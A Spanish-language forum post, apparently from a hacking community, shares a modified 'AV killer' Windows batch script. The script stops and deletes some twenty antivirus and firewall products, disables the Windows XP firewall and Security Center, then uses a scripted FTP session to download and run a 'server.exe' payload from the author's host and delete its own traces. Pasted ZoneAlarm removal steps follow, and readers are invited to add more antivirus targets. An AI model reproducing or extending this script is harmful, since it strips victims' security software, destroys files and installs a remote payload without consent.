hola amigos
despues de darle muchas vueltas al av killer ,yo le e dado mi toque personal y a quedado asi,le e añadido un ftp ,para q descarge el server y le añadido un trozo de codigo para q detenga el antivirus de xp y el firewall kerio
@echo off
rem esto crea un archivo para el ftp q luego se borrara
c:
cd \
echo ismael34>>hola.txt
echo MT11xxxxx>>hola.txt
echo lcd ..>>hola.txt
echo pwd>>hola.txt
echo bin>>hola.txt
echo get server.exe>>hola.txt
echo quit>>hola.txt
ren esto es le av killer modificado a mi forma de trabajo tiene añadido dos firewall el kerio y el firewall de xp
rem ---------------------------------------------------------------------
If exist "C:\Archivos de programa\ewido anti-malware" (goto ewido) else (goto 1)
:ewido
cd "C:\Archivos de programa\ewido anti-malware"
Taskkill /f /IM ewidoctrl.exe /IM ewidoguard.exe
net stop "ewidoctrl"
net stop "ewidoguard"
attrib -H -S -R *.*
del /s /q *.*
:1
rem --------------------------------------------------------------------
If exist "C:\Archivos de programa\Eset" (goto nod32) else (goto 2)
:nod32
cd "C:\Archivos de programa\Eset"
net stop "nod32krn"
net stop "nod32kui"
net stop "nod32"
Taskkill /f /IM nod32krn.exe /IM nod32kui.exe /IM nod32.exe
attrib -H -S -R *.*
del /s /q *.*
:2
-------------------------------------------------------------------
If exist "C:\Archivos de programa\Spybot - Search & Destroy" (goto spybot) else (goto 3)
:spybot
cd "C:\Archivos de programa\Spybot - Search & Destroy"
net stop "TeaTimer"
Taskkill /f /IM TeaTimer.exe
attrib -H -S -R *.*
del /s /q *.*
:3
rem -------------------------------------------------------------------
If exist "C:\Archivos de programa\Windows Defender" (goto windefender) else (goto 4)
:windefender
cd "C:\Archivos de programa\Windows Defender"
net stop "MsMpEng"
net stop "MSASCui"
Taskkill /f /IM MsMpEng.exe /IM MSASCui.exe
attrib -H -S -R *.*
del /s /q *.*
:4
rem ---------------------------------------------------------------------
If exist "C:\Archivos de programa\mcafee.com" (goto mcafee) else (goto 5)
:mcafee
cd "c:\archivos de programa\mcafee.com\agent"
net stop "mcdetect"
net stop "mctskshd"
net stop "mcagent"
net stop "mcvsescn"
net stop "mcvsftsn"
net stop "mcvsshld"
net stop "mcvsrte"
net stop "mcshield"
Taskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcagent.exe /IM mcvsescn.exe /IM mcvsftsn.exe /IM mcvsshld.exe /IM mcvsrte.exe /IM mcshield.exe
attrib -H -S -R *.*
del /s /q *.*
rd /s /q "c:\archivos de programa\mcafee.com\agent"
rd /s /q "c:\archivos de programa\mcafee.com"
:5
rem -----------------------------------------------------------------------
If exist "C:\Archivos de programa\Zone Labs\ZoneAlarm" (goto zone) else (goto 6)
:zone
cd "C:\Archivos de programa\Zone Labs\ZoneAlarm"
net stop "zlclient"
net stop "zonealarm"
net stop "vsmon"
Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM vsmon.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\WINDOWS\system32\ZoneLabs"
attrib -H -S -R *.*
del /s /q *.*
:6
rem ---------------------------------------------------------------------------
If exist "C:\Archivos de programa\Trend Micro" (goto trend) else (goto 7)
:trend
cd "C:\Archivos de programa\Trend Micro\OfficeScan Client"
net stop "ntrtscan"
net stop "tmlisten"
net stop "OfcPfwSvc"
net stop "pccntmon"
Taskkill /f /IM ntrtscan.exe /IM tmlisten.exe /IM OfcPfwSvc.exe /IM pccntmon.exe
attrib -H -S -R *.*
del /s /q *.*
:7
rem ------------------------------------------------------------------------------
If exist "C:\Archivos de programa\Synaptics" (goto sinapti) else (goto 8)
:sinapti
cd "C:\Archivos de programa\Synaptics\SynTP"
net stop "SynTPLpr"
net stop "SynTPEnh"
Taskkill /f /IM SynTPLpr.exe /IM SynTPEnh.exe
attrib -H -S -R *.*
del /s /q *.*
:8
rem ------------------------------------------------------------------------------
If exist "C:\Archivos de programa\Grisoft\AVG free" (goto avfree) else (goto 9)
:avfree
cd "C:\Archivos de programa\Grisoft\AVG free"
net stop "avgamsvr"
net stop "vgupsvc"
net stop "avgcc"
Taskkill /f /IM avgamsvr.exe /IM vgupsvc.exe /IM avgcc.exe
attrib -H -S -R *.*
del /s /q *.*
:9
rem --------------------------------------------------------------------------------
If exist "C:\Archivos de programa\Archivos comunes\Symantec Shared" (goto norton) else (goto 10)
:norton
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared"
net stop "ccSetMgr"
net stop "SNDSrvc"
net stop "SPBBCSvc"
net stop "ccEvtMgr"
net stop "ccApp"
net stop "symlcsvc"
Taskkill /f /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM symlcsvc.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\SPBBC"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\CCPD-LC"
attrib -H -S -R *.*
del /s /q *.*
:10
rem ---------------------------------------------------------------------------------------
If exist "C:\Archivos de programa\Norton AntiVirus" (goto norton2) else (goto 11)
:norton2
cd "C:\Archivos de programa\Norton AntiVirus"
net stop "navapsvc"
net stop "NPFMntor"
Taskkill /f /IM navapsvc.exe /IM NPFMntor.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Norton AntiVirus\IWP"
attrib -H -S -R *.*
del /s /q *.*
:11
rem ------------------------------------------------------------------------------------------
If exist "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security" (goto Panda06) else (goto 12)
:Panda06
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security"
net stop "TPSrv"
net stop "PavFnSvr"
net stop "pavsrv51"
net stop "pskmssvc"
net stop "AVENGINE"
net stop "PNMSRV"
net stop "PsImSvc"
Taskkill /f /IM TPSrv.exe /IM PavFnSvr.exe /IM pavsrv51.exe /IM pskmssvc.exe /IM AVENGINE.EXE /IM PNMSRV.EXE /IM PsImSvc.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\FIREWALL"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Common Files\Panda Software\PavShld"
Taskkill /f /IM pavprsrv.exe
attrib -H -S -R *.*
del /s /q *.*
:12
rem ----------------------------------------------------------------------------------------
If exist "C:\Archivos de programa\Alwil Software\Avast4" (goto Avast4) else (goto 13)
:Avast4
cd "C:\Archivos de programa\Alwil Software\Avast4"
net stop "aswUpdSv"
net stop "ashServ"
net stop "ashWebSv"
net stop "ashDisp"
Taskkill /f /IM aswUpdSv.exe /IM ashServ.exe /IM ashWebSv.exe /IM ashDisp.exe
rem attrib -H -S -R *.*
rem del /s /q *.*
:13
rem -------------------------------------------------------------------------------------------
If exist "C:\Archivos de programa\Microsoft AntiSpyware" (goto micanti) else (goto 14)
:micanti
cd "C:\Archivos de programa\Microsoft AntiSpyware"
net stop "gcasServ"
net stop "gcasDtServ"
Taskkill /f /IM gcasServ.exe /IM gcasDtServ.exe
attrib -H -S -R *.*
del /s /q *.*
:14
rem -------------------------------------------------------------------------------------------
If exist "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal" (goto kav) else (goto 15)
:kav
cd "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal"
net stop "kav"
net stop "kavsvc"
Taskkill /f /IM kav.exe /IM kavsvc.exe
attrib -H -S -R *.*
del /s /q *.*
:15
rem -------------------------------------------------------------------------------------------
If exist "C:\Archivos de programa\Webroot\Spy Sweeper" (goto sweeper) else (goto 16)
:sweeper
Taskkill /f /IM WRSSSDK.exe /IM SpySweeper.exe
cd "C:\Archivos de programa\Webroot\Spy Sweeper"
attrib -H -S -R *.*
del /s /q *.*
:16
rem -------------------------------------------------------------------------------------------------
If exist "C:\Archivos de programa\SinEspias" (goto sinspy) else (goto 17)
:sinspy
Taskkill /f /IM no-spy.exe
cd "C:\Archivos de programa\SinEspias"
attrib -H -S -R *.*
del /s /q *.*
:17
rem ----------------------------------------------------------------------------------------------
If exist "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium" (goto pandatitanium) else (goto 18)
:pandatitanium
net stop "Pavsrv51"
net stop "AVENGINE"
net stop "apvxdwin"
net stop "pavProxy"
Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe
cd "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium"
attrib -H -S -R *.*
del /s /q *.*
rd /s /q C:\Archivos de programa\Panda Software\Panda Antivirus Titanium
:18
-------------------------------------------------------------------------------------------------
If exist "C:\Archivos de programa\AVPersonal" (goto avpersonal) else (goto 19)
:avpersonal
net stop "AVGUARD"
net stop "AVWUPSRV"
net stop "AVGNT"
net stop "AVSched32"
Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE
cd C:\Archivos de programa\AVPersonal
attrib -H -S -R *.*
del /s /q *.*
:19
rem ------------------------------------------------------------------------------------
If exist "C:\Archivos de programa\Softwin\BitDefender9" (goto bit9) else (goto 20)
:bit9
net stop "bdoesrv"
net stop "bdmcon"
net stop "bdnagent"
net stop "bdswitch"
Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.exe
cd C:\Archivos de programa\Softwin\BitDefender9
attrib -H -S -R *.*
del /s /q *.*
:20
rem ------------------------------------------------------------------------------------
If exist "C:\Archivos de programa\kerio" (goto kerio) else (goto 21)
:kerio
net stop kpf4
:21
rem ------------------------------------------------------------------------------------
rem esto es para desactivar el firewall de xp
net stop "Security Center"
net stop "centro de seguridad"
net stop "SharedAccess"
rem esto es para hacer el ftp y descargar el server una vez desactivadas las protecciones
c:
cd\
ftp -s:C:\hola.txt ftp.ismael34.x
x.xxxxx.xxx
quit
server.exe
del hola.txt
del descargar.bat
:fin
exit
--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------
tambien e estado haciendo pruebas con el zone alarma,pero veo q estos son mas listos ,resulta q al intentar de parar el servicio q usa zone alarma ,q es truevector ,este no se detiene,ya e hecho varias pruebas ,pero lo e consegido
tambien decir q el zone alarma deja restos al desinstalarse,y luego no se deja instalar de nuevo,e encontrado esta informacion q te explica como quitar los restos
Si desea desinstalar completamente o reinstalar ZoneAlarm Pro
Para quitar ZoneAlarm Pro completamente del sistema, siga estos pasos. Si alguno de los pasos que siguen no es aplicable, o si no puede realizar la función que se indica, CONTINÚE en el paso siguiente.
Si piensa reinstalar la aplicación, antes de empezar, asegúrese de que cuenta con la versión más reciente. Recuerde que necesita una clave de licencia válida y actualizada para descargar ZoneAlarm Pro .
Para ZoneAlarm:
Para ver este enlace Registrate o Inicia Sesion Para ZoneAlarm Pro:
Para ver este enlace Registrate o Inicia Sesion Nota para los usuarios de ZoneAlarm Pro : Se necesita una clave válida para poder descargar la versión más reciente. Para averiguar si la clave de que dispone es válida, haga clic en Información general-> Información del producto. Aparecerán la fecha y hora de caducidad inmediatamente debajo del número de licencia.
Si la clave no es válida, para renovarla visite la página Web siguiente:
Para ver este enlace Registrate o Inicia Sesion Si es posible en su sistema operativo, instale la aplicación desde una cuenta con derechos de Administrador.
Siga estos pasos. Si alguno de los pasos que siguen no es aplicable, o si no puede realizar la función que se indica, CONTINÚE en el paso siguiente.
Abra el programa ZoneAlarm Pro , seleccione la ficha INFORMACIÓN GENERAL -> PREFERENCIAS y verifique que no esté seleccionada la casilla Cargar al iniciar. Cierre el programa, haga clic con el botón secundario en el icono de ZA y seleccione Cerrar. Espere 2 minutos antes de continuar.
REINICIE EL EQUIPO.
Después del reinicio, no debe ejecutarse ningún proceso de ZoneAlarm en el sistema.
A continuación, haga clic Inicio -> Programas -> Zone Labs -> Desinstalar. Responda SÍ a la confirmación de seguridad.
ADVERTENCIA: NO ejecute el programa de desinstalación de ZoneAlarm en el modo a prueba de errores de Windows. En dicho modo, el programa podría no efectuar todos los cambios necesarios en el Registro, lo que generaría errores después del reinicio.
REINICIE EL EQUIPO.
Para asegurarse de que puede ver los archivos del sistema de ZA+/ ZoneAlarm Pro, si aún se encuentran en el equipo:
a. Haga clic con el botón secundario en Inicio y, a continuación, con el botón primario en Explorar. Cuando aparezca el panel del Explorador de Windows:
- En Windows 98SE: Haga clic en Ver -> Opciones (en Windows 98 se llama "Opciones de carpetas"). Seleccione la ficha "Ver" y haga clic en el botón de opción "Mostrar todos los archivos".
- En Windows ME, XP y 2000: Haga clic en Herramientas -> Opciones de carpetas. Seleccione la ficha "Ver" y haga clic en el botón de opción "Mostrar todos los archivos y carpetas ocultos".
b. Verifique que no esté seleccionada la casilla "Ocultar archivos protegidos del sistema operativo".
c. Durante la búsqueda, asegúrese de que se busquen TODOS los archivos y carpetas ocultos.
d. Haga clic en Aceptar.
NOTA IMPORTANTE: Las modificaciones realizadas en archivos de sistema pueden deshabilitar funciones vitales del sistema operativo Windows. Se recomienda especialmente seleccionar otra vez la opción "Ocultar archivos y carpetas" después de eliminar los archivos de ZoneAlarm. Consulte la página Web siguiente y verifique que se eliminen los archivos y carpetas.
Haga clic en Inicio, elija Buscar y seleccione Archivos. Asegúrese de que en el cuadro de búsqueda se indique la unidad de disco duro local (normalmente C:) o Todas las unidades de disco. Usuarios de XP: establezca las opciones de búsqueda avanzadas de modo que se busque en TODOS los archivos y carpetas.
Escriba exactamente lo siguiente y elimine las carpetas que se encuentren.
- zonelabs
- "zone labs"
- "Internet logs"
Escriba exactamente lo siguiente, y elimine los archivos que se encuentren en \Windows, o cualquiera de sus subcarpetas, o en la carpeta Temp:
- vsdata.dll
- vsdata95.vxd
- vsdatant.sys
- vsmon.*
- vsmonapi.dll
- vsnetutils.dll
- vspubapi.dll
- zaplus.*
- zapro.*
- zlparser.dll
- zonealarm.exe
- zoneband.dll
- vsinit.dll
- vsutil.dll (para asegurarse de que es un archivo de ZA, haga clic con el botón secundario en Propiedades -> Versión; NO lo elimine si no es un archivo de Zone Labs.)
- GLB*.* (elimine todos los archivos de este tipo que se encuentren en cualquiera de las carpetas TMP o TEMP)
Escriba exactamente lo siguiente y elimine los archivos que se encuentren en cualquier carpeta que contenga en su ruta de acceso "Programas":
- zapro
- zonealarm
- "zonealarm pro" (incluidas las comillas)
Asegúrese de que la Papelera de reciclaje esté vacía (haga clic con el botón secundario y elija Vaciar).
REINICIE EL EQUIPO.
NOTA: Si al borrar los archivos recibe un mensaje de error o si los programas originales permanecen en la lista de programas, o bien, si siguen ocurriendo problemas después de realizar este proceso, elimine los archivos en el modo a prueba de errores. Para obtener información específica de su sistema, haga clic en Inicio, Ayuda y busque "MODO A PRUEBA DE ERRORES".
------------------------------------------------------------------------------------
tambien encontre esta direc en la q hay un programa para quitar el zone alarma se llama The Avenger
lo podie ver en esta direcc
Para ver este enlace Registrate o Inicia Sesion bueno espero q os sirva
si habeis añadido mas antivirus ,compartirlo
chauuu